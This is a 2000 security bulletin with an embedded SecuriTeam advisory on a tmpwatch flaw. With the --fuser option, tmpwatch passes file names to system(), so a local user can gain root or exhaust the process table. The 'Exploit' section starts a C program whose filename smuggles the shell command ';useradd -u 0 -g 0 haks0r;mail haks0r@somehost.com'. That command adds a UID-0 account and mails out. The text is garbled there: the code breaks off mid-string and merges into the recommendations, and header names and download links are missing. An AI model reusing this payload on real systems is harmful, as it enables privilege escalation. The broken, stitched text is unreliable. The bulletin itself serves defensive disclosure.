Linux 'tmpwatch' Vulnerability
L-005: Linux 'tmpwatch' Vulnerability

October 16, 2000 16:00 GMT
PROBLEM:       The tmpwatch utility has a flaw in the execution of the
               system() library subroutine.
PLATFORM:      Red Hat Linux 7.0 (tmpwatch v2.5.1)
               Red Hat Linux 6.2 (tmpwatch v2.2)
               Conectiva 4.0, 4.0es, 4.1, 4.2, 5.0, prg gráficos, ecommerce, 5.1
               Trustix Secure Linux
               Mandrake 6.0, 6.1, 7.0, 7.1
               Immunix OS 6.2
DAMAGE:        Through the use of arbitrary commands to the system() library
               a local user account could gain root. By creating
               layers of subdirectories in a subdirectory monitored by
               tmpwatch, a local user could fill the system process
               table. This would cause a denial of service to the system
               requiring a hard reboot.
SOLUTION:      Apply the patches specified in the advisory.

VULNERABILITY The risk is MEDIUM. The advisory has been publicly discussed, ASSESSMENT: with exploit code given.
[****** Begin SecuriTeam Advisory ******] Insecure call of external programs in tmpwatch ------------------------------------------------------------------------ SUMMARY The tmpwatch utility is used in Red Hat Linux to remove temporary files. This utility has an option to call the "fuser" program, which verifies if a file is currently opened by a process. The fuser program is invoked within tmpwatch by calling the system() library subroutine. Insecure handling of the arguments to this subroutine could potentially allow an attacker to execute arbitrary commands. DETAILS Affected Versions: Red Hat Linux 7.0 (tmpwatch v2.5.1) Red Hat Linux 6.2 (tmpwatch v2.2) Conectiva 4.0, 4.0es, 4.1, 4.2, 5.0, prg gráficos, ecommerce, 5.1 Trustix Secure Linux Mandrake 6.0, 6.1, 7.0, 7.1 Immunix OS 6.2 Immune Versions: SuSE Impact: This vulnerability may allow local attackers to compromise superuser access if the administrator in a non-default manner uses tmpwatch. The tmpwatch tool removes files that have not been modified or accessed within a specified amount of time. It was designed to securely remove files by avoiding typical race condition vulnerabilities. System administrators usually run this tool periodically to remove old temporary files in world-writeable directories. The tmpwatch tool uses the --fuser or -s options to avoid removing a file that is in an open state in another process. This option uses the system() library subroutine to call the external program /sbin/fuser with the file name being examined as an argument. The system() subroutine spawns a shell to execute the command. An attacker may create a file name containing shell metacharacters, which could allow them to execute arbitrary commands if tmpwatch with the fuser option is used to remove the file. Source code comparison between the Red Hat Linux 6.2 and 7.0 tmpwatch packages suggests this vulnerability was recognized and a fix was attempted. However, the fix is incorrect, and the vulnerability is still exploitable. Exploit: 1. Compile and run: #include int main() { FILE *f; char filename[100] = ";useradd -u 0 -g 0 haks0r;mail haks0r@somehost.comRecommendations: Do not use the --fuser or -s options with tmpwatch. Red Hat has issued the following RPMs that contain fixes for this vulnerability. Red Hat Linux 6.2: Alpha: Sparc: i386: Sources: Red Hat Linux 7.0: i386: Sources: Conectiva: Trustix Secure Linux: This file can be found at: Or Mandrake: You can download the updates directly from: Linux-Mandrake 6.0: 6.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm 6.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm Linux-Mandrake 6.1: 6.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm 6.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm Linux-Mandrake 7.0: 7.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm 7.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm Linux-Mandrake 7.1: 7.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm 7.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm Immunix OS 6.2: Or ADDITIONAL INFORMATION The information has been provided by xforce@ISS.NET X-Force, grange@RT.MIPT.RU Alexander Y. Yurchenko, tsl@TRUSTIX.COM TSL Team, draht@SUSE.DE Roman Drahtmueller, security@LINUX-MANDRAKE.COM Linux Mandrake Security Team, and greg@WIREX.COM" Greg KH. [****** End SecuriTeam Advisory ******] ======================================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

